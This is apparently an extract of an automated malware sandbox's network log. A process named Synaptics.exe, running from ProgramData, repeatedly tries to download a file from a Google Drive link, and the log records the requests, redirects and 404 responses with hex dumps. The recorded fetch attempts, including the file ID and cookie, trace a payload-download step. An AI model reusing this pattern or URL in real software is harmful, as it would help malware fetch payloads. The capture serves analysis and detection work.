                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            99 | 192.168.2.8 | 49864 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-33mmKliSNVmTHdDllfp8lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            100 | 192.168.2.8 | 49865 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5qE4Nx_iXxCHnBI9DZi1XlPA2wvleKFKfTJZ8BrMlCGgdXWMyv6ySsschhsP67qAO6
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pVZRW9RhZz9WVcbuWr2-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="fWqxO9t1IqBrjolDoh2h8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            101 | 192.168.2.8 | 49867 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:39 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            102 | 192.168.2.8 | 49868 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            103 | 192.168.2.8 | 49869 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:39 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            104 | 192.168.2.8 | 49873 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:40 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:40 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-tJtoRo8v6EXgSH3InsL8DA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            105 | 192.168.2.8 | 49874 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:40 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:40 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Jdvv0qaufe-EH9PaOh5b_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            106 | 192.168.2.8 | 49875 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ehQXczwueL_AAuCb4iGfFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            107 | 192.168.2.8 | 49876 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6UlvWyEt_GMjgNqOse2oAGV9_aBJtksMds6RcqiBqRE4DcuCphIZUch1OLyBIh3FnUY_iWLsI
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Lt5DUs7HtH5sPJ7f_7o2iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="E-kRccdM0i9WTdG1_QB8ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            108 | 192.168.2.8 | 49878 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MwTOY-0DznqvHwU86JOYeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            109 | 192.168.2.8 | 49877 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:41 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5aGZvc6Q3HXDyiqjVeujOVzKCcM5jc-VHfg-lYVKvybX-DHLAQtvv5UErHpsUb9bCEsDrrwDo
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:41 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-U2wGyhEFfG5grkj82CXYbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:41 UTC  140                IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:41 UTC  1390               IN
